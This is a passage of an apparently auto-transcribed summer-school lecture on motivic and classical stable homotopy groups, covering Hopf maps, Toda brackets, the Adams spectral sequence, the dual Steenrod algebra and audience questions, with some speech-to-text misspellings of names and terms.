but we won't really need that GM. Well, anyway, it's GM. It's a more convenient notation. You include plus or minus one into GM, you get something that turns in some cases turns out to be non-trivial. Okay. And we'll call that row. Okay. More generally, you can include one and some unit U into GM. Okay. And get an element of, of pi minus one minus one that we could maybe call bracket U. Okay. And then row is another name for bracket minus one. Okay. Row comes up so frequently that we give it its own name and these bracket U's in general are a little more obscure. Okay. So these are already some geometric constructions. Okay. Closely related to the arithmetic of the field. Right. Okay. Oh, and why is it minus one, minus one, right? Because this is an S zero, zero, and this is an S one one, and then the relative degree is minus one, minus one. Okay. Then there's an element epsilon in pi zero, zero. So that's the twist map. You have GM, smash GM. You have a symmetry, right? Swap the factors to GM, smash GM. The relative degree there is zero, comma zero. That's in pi zero, zero. Okay. And because it's a twist map, not surprisingly, this epsilon controls commutativity. And we'll write down a formula in a minute for what exactly I mean by that. But epsilon is, is essential if you're going to want to study some form of commutativity. Okay. So now, so the, those are sort of like the elementary like most naive, you know, some of the most naive things you could think of. Okay. And now things get a little more interesting. Okay. And so you borrow an idea from very classical topology, right? From, from at least as far back as Hopf, right? Okay. So, and you can construct a Hopf map eta. Okay. In pi one, comma one. I'm going to construct eta in a way that's, it's probably not the most common, it's probably not the way that most people who have seen this before think of, of, of eta. Okay. But it's, it's, it's useful for a certain perspective. Okay. So eta is in pi one one. So here's what I do. Okay. Start with GM cross GM. Okay. And it has a multiplication map to GM, right? GM is a group, right? And then suspend it once. That's what the suspensions are. Okay. So this mu is really suspension of you. Okay. So there's that map mu. Okay. It turns out for very general reasons. Okay. After one suspension, a product always splits. Hey, this is a very general fact about, about homotopy theory. And so this, so this, this product splits. And one of the some ends of this splitting is the suspension of GM, smash GM. Okay. So there's this inclusion here, right? That comes from this very general categorical splitting. Okay. So now you have a map from suspension GM, smash GM into suspension GM. Okay. That composition. And you go and you count the degrees. What do you have here? So one, two, three spheres, two twists, right? So three, two. Here you have two spheres and one twist. And so you have two, one. Okay. And then the relative degree is one, one. Okay. So there is, there is a map. Okay. And that map, that's the same. The way that people usually think about Ada as the projection from a two minus zero down to P one. Okay. And this is the same map or maybe it's off by a minus sign, but it's essentially the same map as, as that construction. Okay. And, oh, the other thing, you know, I should have said this at the beginning actually, you know, all of these geometric constructions that I'm doing here are, are, are unstable, right? I'm actually doing unstable constructions here and then stabilizing them, right? In order to get stable homotiltons. But this map Ada really exists in S three, two to S two on unstable. Okay. And so, so there's Ada. Okay. And then, you know, from classical topology that the Hofmaps don't end at Ada that there are higher dimensional analogs of these things. And so we'll take a look at the next one. Okay. New. All right. So here's what you can do with new. You can take the group SL two. Okay. That's of course a group. And then, and you have the multiplication map, right? After one suspension from S suspension, SL two cross SL two, do suspension SL two. Okay. And again, this categorical splitting, right, gives you a map from suspension SL two, smash SL two into suspension SL two. Okay. Now, here's the interesting fact. It turns out that SL two has the homotopy type of S three, two. Okay. That's not a hard, that's a relatively easy geometric thing you can do. You just look at columns that have to be, you know, in determined it has to be one and you can kind of contract, you know, things down and get that equivalence. That's not a, that's not a very hard fact. But it's an observation. Okay. And so then SL two is an S three two, SL two is an S three two, SL two is an S three two. And you go up and you count degrees and you end up with a map from S seven four to S four two. Okay. And then that gives you a construction new that works unstably and it works over any, over any possible base. Okay. Finally, something weird happened here. Hang on a second. This is supposed to be S seven four. Okay. Now, with Sigma, a new complication arises. A new, the new complication is that you can't model Sigma as this kind of hop construction on a group object. Okay. What you have to use is a non-associative multiplication. Okay. But you can show that over any base S seven four comma four has a non-associative multiplication. Okay. And then you use that non-associative multiplication in the same way as before using that splitting to get a map from S 15 comma eight to S eight comma four, and that's pie seven four. Okay. So great. So that's the classical stuff. Right. And now we know from classical history that you can't really expect to go much further at this sort of naive level. Right. That that there's something maybe more sophisticated. If you really want to go further, you're something you have more sophisticated that you have to do. Okay. But before we dive into those more sophisticated techniques, let's talk a little bit. So we've got these elements row bracket you epsilon eight and new sigma. And let's talk a little bit about relations amongst these things. Okay. So who in Creech proved a very nice result? It's basically a Steinberg relation that you top bracket you times bracket one minus you always equals zero. Okay. And epsilon squared is one that epsilon was the twist. And so if you twist twice, of course, you get the identity. Okay. So the formula I wrote it down here for the formula for graded commutativity. If you want to compare alpha beta and beta alpha, what you have to do is possibly put in a minus sign, right, and possibly put in an epsilon factor. Okay. Depending on the degree of alpha and beta, the exact formula here is not so important right now. You can look that up later if it's a formula that you want to use. But the point is if you do the kind of like the diagram chasing and you figure out exactly what happens when you swap factors around, you have a plus or minus one and maybe an epsilon in there as well in order to switch things. Okay. And that's sort of a really interesting wrinkle. Classically we see the minus one. We don't see the epsilon. That's a really interesting wrinkle. Okay. You can show that row times one minus epsilon is zero. You can do this geometrically. You can draw, you can construct complexes and show that this factors through something contractable, right? Same thing with eta times one minus epsilon. Eta times new and new times sigma. You can show all of these relations here. You can show them geometrically by constructing complexes that constructing objects that are contractable that these compositions factor through. Okay. And of course for those who know about this stuff, what you're seeing on this slide is a lot of information about Milner-Vitt k-theory, right? Some of what's going on in Milner-Vitt k-theory is appearing in some of these formulas. Milner-Vitt k-theory is saying even more than that and I don't want to get into that in these talks but I just want to sort of make a nod to that whole circle of ideas that you can develop them further. Okay. So instead I'd like to go in a different direction. Okay. So how might you go deeper? How might you produce more stable homotopy elements? Okay. So one thing you could do is you could follow Tota's classical work. So Tota carried out some sort of amazing stable homotopy group computations with really very little technology. Without using things like the atom spectral sequence, he was able to go remarkably far into the structure of the classical stable homotopy groups. And you could try to follow the approach that he, the kind of approaches that he adopted. For example, you could use Tota brackets. Okay. So a Tota bracket is a way of building new stable homotopy elements out of old ones. It's kind of like composition but more sophisticated. Okay. And we've talked a little bit about that or this is part of the higher structure of the stable homotopy groups. Okay. So one, the first example that that occurs is this Tota bracket that I've written down on the screen. So eta, comma, one minus epsilon, comma, new squared. Okay. And it turns out that we know geometrically we know that eta times one minus epsilon is zero. I already wrote that relation down. And then it also turns out that one minus epsilon times new squared is also known to be zero. Okay. And that, those two relations make this Tota bracket defined in pi eight five. Okay. And that thing exists. That's again, this is all over spec Z, right? This is in the universal or even unstably, right? You can even make this unstable Tota bracket. This all works in complete generality. Okay. And you could try to go further, right? But it gets harder and harder and more and more ad hoc. And it's just not sort of, you know, well, you could do it. I just, you know, and, but this is as far as people have, I think really gone in this direction. And again, I, again, I do think that people could go further if they decided to sit down and think it through. Okay. So this is kind of the end. Okay. All right. So now we come to kind of like to a turning point in the history of stable homotopy groups, right? With the advent of the Adams spectral sequence. Okay. So the ad of spectral sequences, of course, due to Adams, right? But it was also, one should give a certain amount of credit to Sarah as well. Right. So Sarah had this, had these some ideas about computing state computing homotopy groups by this method of, you know, of using Island room, coal, knowledge of Island room reclaimed spaces. And to a large extent, what Adams is doing is systematizing and organizing the kind of ad hoc approach that, that, that, that Sarah was sort of trying to kind of like to kind of describe. Okay. Question. Do we have motivic, moho old root invariance defined? So yes, there are root invariance running around in this story. There are a few different ways that you, a few different things you could mean by that. Okay. The short answer is that you should look at JD Quigley's work. JD Quigley has written a couple of papers, I think, about motivic homotopy theory and root invariance. And he has shown how to construct these things in some level of generality that I forget off the top of my head. And he has carried out some computations, right? And she's kind of indicating what maybe these things are good for. And there's another sort of, let me just, since we're on the subject of root invariance, let me also say that one of the sort of ongoing projects that, that I and some of my co-authors have is to use our motivic homotopy theory to further our knowledge of classical root invariance. Like I think that our motivic, the homotopy theory can beat the, can beat the classical topologists at their own game that we can do better at, at computing root invariance if we use a little bit of motivic homotopy theory. Okay. All right. And it looks like in the chat that there was a link posted to, to JD Quigley if you want to know more about a motivic root invariance. That's a, that's a good question. Okay. So, we're going to talk about the atom spectral sequence. Okay. So, this is supposed to be a summer school, right? And this is the first week of this summer school. And so, I decided that to spend a certain amount of time kind of covering, covering, you know, what's really, what's really background, right? And so, I want to talk in some detail about how, about what the atom spectral sequence is about how you construct it and why this particular construction ought to be something useful and interesting. Okay. So, this, this next part of the, of the talk is really all classical review. Okay. And then I'll say some things about the motivic and equivariate variations, you know, that, that come up maybe at the end. Okay. So, I'm going to write H for HFP, right? Brunberg-McLean spectrum and a prime. Okay. And I write P, but really in my own head, I think P equals two because I'm always working at two, but, but I guess we don't need to do that here. Okay. So, H star, right, the coefficients of H star is, is FP, right? That's easy enough. Okay. And then the other thing we need is H star H or in other words, the homotopy of H smash H. Okay. And that's the dual steamer and algebra, A star. Okay. Which is a Hopf algebra. Okay. So, it has a multiplication and a co-multiplication. Okay. So, this Hopf, this, this A star, it's kind of complicated. I'm not writing down the formulas for it right now. Although we will write down formulas later. Okay. But the point is that it is in completely explicit, is completely known. Okay. The other thing that I'm doing is that I am always writing the dual steamer and algebra. I am never talking in this entire series, I am never going to talk about the steamer and algebra. I'm only going to talk about the dual steamer and algebra because it turns out that, that the computations work out much more nicely in the dual case. Of course, in some philosophical sense, their equivalent, all you're doing is, doing is dualizing over a field. But the formulas are much nicer to write down in the dual situation. And so, that's one of the, one of the real, one of the early obstacles that a lot of students have to diving into this subject is making that transition from the steamer and algebra, which is more natural psychologically to the dual steel steamer and algebra, which is much easier to work with in practice. Okay. So, that's something that you kind of have to train yourself to spend some time doing and you have to train yourself to think in those dual terms. Okay. So, there is a unit map from the sphere to H. Okay. And it has, and then that gives you, if you take the fiber, you get a cofiber sequence and that's the definition of H bar. Okay. So, H bar is like the difference between the sphere and H. Okay. And that looks like sort of just sort of an arbitrary thing. There's no motivation for that. Okay. But here's a little bit of motivation, right. If you look at the homotopy groups of H smash H bar, right, what you end up doing is you end up taking A, you get A bar, right, which is the augmentation ideal of the dual steamer and algebra. So, H smash H bar has a nice algebraic interpretation, right. It's a topological thing, right. But algebraically, it's corresponding to taking the augmentation ideal. Okay. All right. So, here's, so that's the ingredients that we need. Okay. So, that's how you construct an atoms resolution. Okay. So, you start with, here's this cofiber sequence that we just talked about on the left. Those two maps make a cofiber sequence. Okay. And then if you take that cofiber sequence and you smash it with H bar, right, take each of these three objects and smash them with H bar, you get these three objects. Okay. And so, those three objects also form a cofiber sequence. Okay. And then if you take those three objects and you smash them again with H bar, you get those three objects and you get another cofiber sequence. Okay. So, in this picture, each of these L shaped, these three terms in a shape of an L form a cofiber sequence. Okay. The row itself is not any kind of exact thing. It's more of like of a resolution or something like that. Okay. All right. So, whenever you have this kind of sequence of nested cofiber sequences, right, you end up with a spectral sequence. Okay. The spectral sequence starts with the homotopy of these third terms, this H, this H smash, H bar, H smash, H bar, H bar, and so on and so forth, starts with the homotopy of these third terms and it converges to the homotopy of S zero. Okay. The other way of thinking about this is that here's S zero and you filter S zero along this tower. This is like a filtration of S zero and then these are the associated graded. These are the layers of the filtration, like the associated graded. That's another good way of thinking about it. And that's what a spectral sequence does, right? It goes from the layer, it passes from the layers to the whole object, right? And so that's exactly what you get here. So, the E one page of this spectral sequence has the homotopy of all these guys, right? And it converges to the homotopy of the sphere. Okay. And then to make this converge, you need some P completions here, right, for convergence. And that's okay. You've chosen a P up at the very beginning here, right? And so there's some convergence there, but that's that, which again, you know, as I've said, is manageable, right? There's some things to do, but it's manageable. Okay. So, this looks fine, right? But what's really going on here? Why would you do this? Why, what makes this sort of anything useful other than just some like arbitrary, like, you know, crazy arrows that I've written down on the screen? Well, it turns out that this E one page is totally computable, right? We know a lot about H smash H bar, H smash H bar. I wrote that down earlier. That's the augmentation ideal. Okay. And it turns out when you smash with more powers of H bar, it still is computable. Okay. And so what you get in this E one page, this E one page, I've written it out here more explicitly. Okay. You get an F two, that's from H, that's the homotopy of H, you get an A bar, that's the homotopy of H smash H bar. And then you get the second tensor power of a bar. That's what this homotopy turns out to be. That's not very hard. It's a little bit of a computation and you can get that that's the second tensor power of a bar. And then the third tensor power and the fourth tensor power and so on and so forth. Okay. So, this E one page, this has a name. This is this is called the cobar complex of a. Okay. So, we'll talk a little, we'll talk in more detail about this thing later and carry out some computations. Okay. What this thing is, is a differential graded algebra whose homology is the X groups of the ring A over with coefficients in F two comma F two. Okay. So, this cobar complex is sort of like, it's kind of, it's a fundamental object. Right. It's a key tool for computing X. Okay. And this observation, I think is really now that I've written this down, I think now you can go back and you can look at the motivation for what the atoms resolution is doing. Okay. When you want to study the higher invariance of a ring F two because you're taking the prime two. Yeah, exactly. That's a typo. That could be, these can be those, those twos should be P's at this level. I just, I always forget because I literally like I eat and breathe and sleep P equals two and so I just, I constantly forget that. Okay. So, so when you want to study the higher invariance of a ring, we know what to do. We take a resolution and we take derived, you know, X and all that and tour and all that sort of stuff. Right. We take, we do that sort of thing and the cobar complex is a nice convenient tool for those resolutions and doing those kinds of derived constructions. Okay. So what's happening here in this atoms resolution is you're doing, you're trying, you're trying to, you're playing out that same story, right? Of looking, of taking resolutions and looking for higher invariance, but instead of doing it in algebra, you're doing it in topology. You're using the spectra themselves to build the resolution, right? But you're really mimicking the algebraic situation here in topology. Okay. So that's a good kind of one, a good way of sort of motivating of wrapping your head around what the atom spectral sequence is really trying to do. Okay. So Ben, sorry to have interrupted you. There is a question on the chart. One more P on the E1 page. I don't see it right here. Here. Oh, yes, you're right. Okay. Thank you. That should be a P as well. Great. Okay. All right. So the upshot here is that the E2 page turns out to be is X over A, Fp, Fp. Okay. And then that's converging to the stable homotypic groups. Okay. That's the kind of like that. That's kind of like, you know, the consequence of having done all of this. Okay. And that's kind of like the key that that's somehow, some sense like that's the thing that you need to remember from all this. If like you didn't wrap your head fully around what all of this, if you didn't fully wrap your head around this whole construction of the atom spectral sequence and where it comes from and what it's motivated by, you don't necessarily to worry too much about that. What's important is that there is a spectral sequence. It starts from X groups and it converges to the stable homotypic groups. Okay. And we're not really going to dive into any of the details of the construction in the rest of these talks, but we are frequently going to be talking about X groups and how they're related to stable homotypic groups. Okay. So this one, this formula right here at the bottom is really kind of like the thing that we need to carry forward with us. Okay. So here is the program. The program is first compute those X groups. Okay. That's an algebraic exercise. We know A explicitly. We know Fp. We can do that X groups explicitly. That's algebraic. Then it's a spectral sequence and this spectral sequence can have differentials and it does have differentials. Okay. So you have to analyze the differentials in the atom spectral sequence. Okay. And then finally, you get this E infinity page, but then there's some interpretation of the final answer and that is involved the solving extension problems. Okay. So we're going to talk in great detail about each of these three parts of the program, but this is how it goes. There's always these three steps. You need the algebraic input. You need to analyze the differentials and then you need to interpret. You need to analyze the hidden extensions interpreting the final answer. Okay. So everything I've said over the last few minutes was entirely in the classical context. But these all work just fine. This is a pretty general setup here, right? And it works just fine, K-motivically or G-equivariantly. And the key point is you need to know about the cohomology of a point or the homology of a point, I guess, and you need to know the dual-steroid algebra explicitly. If you know the dual-steroid algebra explicitly and you know the homology of a point explicitly, then you're ready to go. You can start an atom spectral sequence project. Okay. And there are additional complications with convergence in this motivic or equivariant context, but these are manageable. It requires real work, but these things work out. And so various people who have worked on these constructions, these sort of foundational stuff for the motivic or equivariant atom spectral sequence include Morrell, Duggar, Elf, who increase, who increase, and Orm's B, maybe some others as well. Okay. Question. Is this X in modules or co-modules? Is there a difference? Okay. So what I, this is a good question, and this is an important point, and I always get sort of tripped up about this, and then there's Tor and Cotor also and all the duality. So what I'm thinking of here is X in modules. Notice when I wrote X sub A here. I didn't write A star. I wrote A. Okay. And so that's what I mean. I mean, A is a ring. Fp is a module over A, and I'm taking the derived functors of HOM in the category of A modules. Okay. That's what I'm referring to here. Okay. You know, when you take X, right, what you do is you take a resolution for F2, right, for Fp in the first variable, right? And then you hom it into Fp, right, and then you take homology. Okay. And the co-bar complex is what you get. The co-bar complex is the thing that when you take a free resolution of Fp, and then you hom it into Fp, what you get is the co-bar complex. Okay. And then the homology of the co-bar complex is X over A. Okay. So that sort of duality is kind of built in when I take the co-bar complex. That hom into Fp that's happening there. Okay. So that's the right way to think about this. You can set this all up in the category of co-modules. Okay. The category of co-modules is like dual is equivalent to the category of modules in some sense, and you can set it all up that way and change the names of things. But let me just leave it there. That's saying I mean X of A modules, X in A modules. Okay. All right. So what we need to learn about, right, is the co-homology of the classical steamer and algebra. In other words, that's the name that we give to X of A, F2, F2. So now I'm writing P equals 2 here because I want to talk in detail about how the computations play out. Okay. So that's the first thing we need to do. We need to dive in to this algebra and study this. Okay. So in the 21st century, the way that we study these X groups is by machine. Okay. Computers love to do linear algebra, and we can ask the computer to construct minimal free resolutions of F2 as long as it will hum along for a few months and produce all kinds of great data. Some people who are closely associated with this idea are Bruner, Nassau, and Guozhen Wong, who at various points have written and implemented effective software for doing this. Okay. These computations are effectively implemented in a very large range. Okay. Out to like, you know, say maybe 200 or more steps. Okay. Far beyond our ability to interpret it. Okay. And that will always be the case, right? So we should take the computer data essentially as given. Right? We have as much computer data as we want. Okay. So I am going to switch now. So let's take a look at what this ends up being. Okay. And we'll talk more about where this comes from in later points. But for now, I just want to dive in. I want to sort of look. Let's just look at some data. Okay. So what you're looking at here is a classical X chart. Okay. Or an add, or, you know, a classical Adams chart. Okay. So, you do see off to the right, you see some blue and red lines. Those are Adams differentials, which I don't want to talk about now. We'll come back later and we'll look at this chart again. It's just, this was the chart I had available. And so I just, I used it, right? But we want to kind of ignore those blue and red lines and just look at the black dots and lines. Okay. So this is what you get, right? There's this huge, big graded group. Okay. And it starts off looking in low dimensions. It starts off looking not too bad. Okay. It's, you know, it seems sort of manageable, right? And even in this range, right, there aren't too many dots. It sort of seems manageable, right? And as you go out further, things get more complicated, but still not too bad. It's getting me a little bit crazy around here. And then things get worse, you know, and sort of, you know, maybe more irregular. If I zoom out a little bit, I can show it. This chart goes out to 70. We have charts that go much further than that. But that obviously, but going out to 70 kind of like proves the point. When you get out into this range, things get, and again, we kind of want to ignore the colored lines, but even just look at the number of dots, like right here in this degree, there are three different dots, right? So things get a little bit complicated. Okay. You can see some regular patterns, right? Like if you look up along the top, you see this, a regular repeating pattern there. Okay. And you also kind of see some parallelograms that kind of regularly repeat along here. And there's some, there is some regularity at the top of the chart. And there's a lot of noise along, along the bottom. Okay. So this is what happens. You start with the steward an algebras, you start with F2, you compute X, and you get this thing, right? That has structure that has, you know, periodicity that has some regular structure, but also has a lot of irregular structure. Okay. And that's what you expect is you go into higher and higher stems, you expect to see more and more complications, more and more irregularities, and that's okay. Okay. All right. So this is what it's meant to be, so there's no detail here, right? Of course. And that's not the point, this is sort of more like a cultural kind of presentation rather than anything, you know, in, in, in specific, but to give a sense of what's going on. I should mention, well, while we're looking at this and the things we've talked about before, this guy here, H0, that's the, that guy detects the element 2. Okay. And that's 4 and that's 8 and so forth. H1 detects eta in pi 1. H2 detects nu in pi 3 and there's sigma in pi 7. Okay. We talked about eta nu and sigma, the motivic versions of them, but these are the classical versions, eta nu and sigma in pi, pi 1, pi 3, pi sigma, pi 7. Okay. And we also talked about this guy, this bracket in pi 8 5, right? We talked about this sort of like way you could construct another element in pi 8 5. And that's corresponding to this element right there called C0. Okay. And that's how I knew to write down that particular toto bracket because I knew that C0, that's the next thing that you might be interested in. Right? And so you could, so, and so I wrote down a bracket for that next thing and then pH1, you could try to write down a bracket for pH1 and pH2 and D0 and so forth, right? And these would be perfectly worthwhile things to have, have construction stuff. Okay. So you're already kind of picking up a lot of information just by looking at this chart kind of qualitatively without even worrying so much about where things exactly come from. Okay. So now the other thing I want to do, and again, this is, ah, okay, sorry, the question about the degrees here, right? So the vertical axis here is the atoms filtration. Okay. And the horizontal axis is the stem, the vertical axis is the atoms filtration and that's how all of my charts will be organized. Okay. So this is a classical chart, so there is no weight. Okay. It's just C0 in pi 8 here. Okay. So the way it comes out, its weight is 8.5. Okay. When I do show you motivic atoms charts later, they will not, the weight will be suppressed, right? The motivic atom spectral sequence is trigraded. There's the topological degree, there's the weight, and there's the atom filtration. Well, I can't plot it in three dimensions. I've tried and it doesn't work. So I have to suppress the weight. Okay. And so pi 8.5 will appear right here and you won't see the five. You'll have to go into the computations or look up the tables and see what the weights of these elements are. All the weights are known and they're in tables but they're not displayed on the charts. Okay. That's a great question about how the charts are laid out and where the weights are. Okay. So now what I want to do is I want to show you a different thing. I want to show you this. Okay. So I want this, maybe I'm just sort of showing off here by, okay, you guys should be able to see a window. Okay. So this is a Chrome browser and it is displaying an app that Hood Chatham wrote or is writing. So this thing is a, Hood is writing a spectral sequence sort of analysis tool. Okay. It doesn't do the hardcore computations. The hardcore computations are done elsewhere and then imported into this interactive tool. Okay. So I can scroll around on this thing, right, and I can click on a by degree, right, and then I click on that by degree and over here it lists on the right side. It shows me the name, gives me the names of the classes and it tells me something about the products. Okay. I can move, I can move elements around if I want to. For example, if I don't like the way these things are located, I can go in here and I can switch their locations like it just did. Okay. And so forth. Okay. So this is still in relatively primitive state. It's not ready for public release, but it is making progress and I thought I would like to show it off and put in a plug for the great work that Hood is doing. This kind of a tool is a great way of sort of keeping track of what's going on. When you get into higher stems, there ended up being so many elements right after a while that you really need a good way of keeping track of things, right, and all these different relations, right, and this is this nice interactive tool for really studying things. We intend eventually to allow input atoms, differentials, and so forth and make it a really nice scratch pad for carrying out special sequence computations. So that's something that I'm hoping coming in the next year or so, a product that I certainly want to use and that maybe other people who are carrying out these kinds of explicit computations would be interested in as well. Okay. So let me go back now to the presentation. Okay. And I want this one. Okay. So what I want to do next is talk about how you, you know, studying these X computations and more detail. What's really going on in these X computations, okay, and a good, sort of like the most naive way to tackle this, these X groups to begin with is to study the cobar complex. Okay. So I want to say a little bit of, we're almost out of time for today, so I'll say a little bit about this now and then we'll pick this up again, I think on Thursday, the next talk. But we'll start talking about it now. Okay. So first of all, what I've been talking about the dual-stern algebra, but I haven't told you what it is explicitly. Okay. So what it is, is a polynomial algebra on generators zeta 1, zeta 2, zeta 3, and so forth. Okay. And this is a computation this is due to Milner. Okay. But this thing is a hopper algebra, not just an algebra. Okay. It's got a product and a coproduct. Okay. And the coproduct, I've written down a formula for the coproduct over here on the right. Okay. So this is a complicated formula with a lot of moving parts and not so easy to understand. And I don't expect you to sort of stare at this thing and memorize and wrap your head around it fully. Well, one thing to remember is that the coproduct in the dual corresponds to the product in the steam-read algebra. So in the steam-read algebra, you have these adem relations, right, that have to do with the product structure. The adem relations are somehow encoded in this coproduct information here. Okay. The product, the nice polynomial product over here corresponds to the coproduct in the steam-read algebra. That's the carton formula. The carton formula is a nice regular thing in the steam-read algebra, and that's corresponding to the nice regular polynomial structure here. Okay. One thing that I want to point out is that what are the primitive elements? The primitive elements are elements whose coproduct is just themselves, tensor 1 plus 1 tensor themselves. Okay. And the elements that are primitive are precisely zeta 1, 2 to the n. Okay. And that's it. Okay. If you take anything else other than zeta 1 to a power of 2, then you're going to get something that's not primitive. Okay. So that's kind of an important point that we'll see in a minute here. Okay. So the cobar complex is, we've talked about this F2A, I guess I mean A bar. Okay. And then A bar, tensor A bar, and so on and so forth. Okay. So if you dive a little deeper into the cobar complex and you look at what these maps are, you discover that this first map is the coproduct. Okay. So if you want to actually compute the homology of the copar complex, which is exactly what we want, we want the homology, you need to understand this coproduct, which I've written down here. Okay. And we'll dive into this next time. Okay. So next time we'll go back a little bit. We'll set up the cobar complex again and we'll dive more into computing X groups and we'll carry out lots of explicit examples. Okay. I think that's a good place to stop for today. Okay. Many thanks indeed. And let's thank the speaker. And so are there any questions? Please raise your hand to the chart, please. There is a question. Yeah. Are there people working with Motivic? He wrote A-N-S-S, which is Adam's Novikov spectral sequence for other primes. And Adam's Novikov spectral sequence is something to work on. But what we've been talking about today is Adam's spectral sequence at other primes. So not so much. Okay. There are some philosophical reasons to anticipate that while the Motivic Adam's spectral sequence has been sort of really interesting at the prime two, that at odd primes somehow things are a little bit more kind of just like the classical story with some extra weights thrown in and a little bit of curiosity. Okay. There are some indications that that has been, or let me rephrase that. Let me say the conventional wisdom over the last 10 years has been that somehow the odd primary computations will be like classical with a little kind of like, you know, perturbation, a little, you know, a few little wrinkles. The P equals two computations are somehow much more fundamentally interesting. Over time, I'm becoming less and less convinced of that conventional wisdom. So I consider it sort of like this odd primary computations to be sort of a wide open subject. I think there's a lot of room for someone to dive in and really sort of tear these things apart and see what's going on and have a good and try to get a better understanding of what's happening there. So there is some work, you know, but there's really nothing like real well-developed. Okay. Other question. Any special homology theories such that sigma or nu is not zero? Okay. So I question, I think the idea here is that can you so the thing about, you know, the ordinary homology is that it detects one, right, and sort of nothing else, right? And and maybe and then something like K O complex, sorry, not complex real K theory, detects the element eta, right? And then the idea is that could you go further along those lines and find something further more complicated than K O that detects nu and detects sigma. Okay. So it depends on what you're looking for. But one thing that detects nu is is TMF. Okay. And that's sort of one big reason why TMF is so interesting is that it captures eta and nu and the various higher consequences of having eta and nu at hand. Okay. And yet it throws out all of the additional complications that occur with sigma and in higher places. Like so, for example, when we wrote down that form that total bracket for that guy in pi eight that what was it, eta comma one minus epsilon comma nu squared. Well that's a thing that's built out of eta and nu and two and things like that. And so that guy does is detected by TMF because it's associated to those eta and nu type family. Right. And so that's one answer is that that's kind of like from my perspective, that's why TMF is so interesting. Other people have other reasons for it. And that's and those are important reasons also similar work regarding the equivalent case. Yes, absolutely. We are in the midst of cranking through the atom spectral sequence at for the C2 equivalent atom spectral sequence anyway, and we are making progress. And I'm hoping by the end of the third talk to at least talk a little bit about that. That's time permitting. We may or may not get to that, but absolutely. One can one can see there's work there by Bert G. You and myself, Mike Hill, Doug Ravennail, Bert G. You and myself and Hanukong has also made some progress along those lines. Milnervitt K3 know about nu and sigma. New Milnervitt K3 does not know about nu and sigma. I wrote on that slide here, I can share that. Let me find that slide. I wrote on this slide. I'll see also Milnervitt K3. What I meant by that was that many of the formulas that I wrote down, many of the constructions and formulas that I wrote down in this section are related to Milnervitt K3. Not all of it, in particular the nu and the sigma are not in Milnervitt K3, but the eta, the rho, the 1 minus epsilon, the bracket u, that part of it is really sitting inside of Milnervitt K3. I'm sorry for that. That was my fault for writing a confusing slide. Equivariant dual-steam-run algebra for p and odd prime. Yes, lots is known about the equivariant steam-run algebra at even primes and at odd primes. The thing to remember is that you have to have a group as well. It depends on what group. If you're working with C2, then I think we know both the odd and the, you know, we know the two primary steam-run algebra. We also know the odd primary steam-run algebra. But the odd primary steam-run algebra is not very interesting. It's C2. C2 is a group of four or two. We expect the p equals two computations to be more interesting than the odd primary computations. For CP, for an odd prime p for CP, I think that this is now known. And maybe in slightly more generality. What I would look at is, I would go, I don't have to top of my head, I don't have the answer, but I would go search for things that Igor Krisch and various co-authors have written, have been writing recently, have been writing about this. And I forget exactly what, but there is sort of an ongoing program to expand these kind of steam-run algebra, co-molgeal point computations into larger and larger classes of groups. And unfortunately, things get kind of really complicated really quickly. And we're not ready yet to dive into atoms, computations with those types of things yet, because they're just, even C2 is really giving us a real challenge. And the bigger groups are just going to be a nightmare at this point, although eventually we'll get there, but that's off in the future. Atoms types, fixed sequence based on Chow-Witt co-molge. I have not thought about that. I'm not exactly sure what you mean by Chow-Witt co-molge. I think maybe you mean something like KQ or KQ with Aida inverted or something like that. So maybe you're kind of getting at some sort of version of this, so this BO resolutions. Yeah, so yeah, I think you mean KQ with Aida inverted, then maybe, maybe. I don't know what that reminds me. The question, Sean Tilson's question reminds me about Chow-Witt co-molge, reminds me of this, this story of BO resolutions. So Mahowald and co-authors attempted to mimic the atom spectral sequence, but instead of using homology, H, ordinary homology, they used something like KO, real K theory, and they tried to carry out an atom spectral sequence type analysis for KO. And they got a fair ways, right? And they saw some interesting structure that you couldn't see otherwise. So it was partly successful. But the computations also get very complicated. And so it was only partly successful. Some of that KO story is now being developed in the motivic context. So who is this? So Dominic Culver and JD Quigley and maybe some other people as well are working on that sort of thing. Okay, Mark Levine is saying that Chow-Witt is like a version of C2-Bredon homology. Yeah, then I'm not really sure how Chow-Witt fits into this. It's not something I've thought about. Okay, the homology of a point, how does one go around these computations? Okay, so, oh sorry, I'm jumping here. Wait, let me go in order. Can you explain what E1 and E2 definition are here? Is the spectral sequence defined in a different way to come on to theory? Okay, so I think the question here is with the atom spectral sequence, right? How is E1, how are E1 and E2 defined? So E1 is defined simply by taking the homotopy of the homotopy groups of these third terms, of these layers. Okay, that's all it is. It's just that. That's the definition of the E1 term. And it turns out that we know what the homotopy of these guys are. And this has, and it's expressible in terms of the co-bar complex. Okay, so there's two steps here. Formally E1 is this, and then computationally we know that this equals something in terms of a bar about the augmentation ideal of the dual-stereoalgebra. Okay? Then the E2 page is defined to be the homology of the E1 page. There is a differential on the E1 page that goes from one term to the next. So here's how it goes. If you start with something like this, right, you remember this is a co-fiber sequence. Okay? So there is a map, there's a shift map, right, a boundary map from this guy, it goes maps here, let me draw it in color. There is a shift map that goes back there, right? It goes to the suspension of that thing. Okay? And then, so you can apply that and then apply that map, and you get a map from here to here. And the same thing, from here you have applied the boundary map, and then down, and so on and so forth. And that map, that's the D1, okay? So when you take the homology of E1 with respect to that differential, you get the E2 group, the E2, and that turns out to be X. And again, that's a computation, right? So formally, it's given by this composition, but it's a computation that it works out to be X over A. Okay? And then about the motivical homology of a point, how does one go about those computations? Okay, so computing the motivical homology of a point is a very deep, very difficult problem, right? This is the blockado conjecture, right? So Vavadsky did these computations, okay? That is, I do not feel qualified to talk about the details of that sort of thing here, and so I'm not gonna say anything about it, and it's certainly not something we're gonna get into in any detail. However, let me foreshadow something that I'm gonna say more about tomorrow, that in certain cases now, we have a kind of a way of working around all of the deep, difficult mathematics that Vavadsky did to compute the motivics, the neuron algebra, and to compute the motivical homology of a point, okay? So in certain cases, in particular, in C-motivical motopy theory, for the kinds of things that I do, we don't really need Vavadsky's computations anymore. We have another way of accessing the same results, okay, using deformations of homotopy theories, and I will specify a little bit more about that in my second talk on Thursday. Okay, let's thank the speaker again, and so, well, the next talk is in 90 minutes, maybe less by Tina Gerhardt at 6 o'clock peristime. Okay, I'm seeing a comment. I'm not in a hurry to stick around, to leave, and this channel stays open, right? Yes. Okay, I'm seeing a comment from Paul Arna that Sean means Milnervit Motivical Homology. So right, so that makes a lot more sense to me. I don't know. That's an intriguing idea. I don't know, I mean, I know of this Milnervit Motivical Homology, I don't know much about it, right, Tom 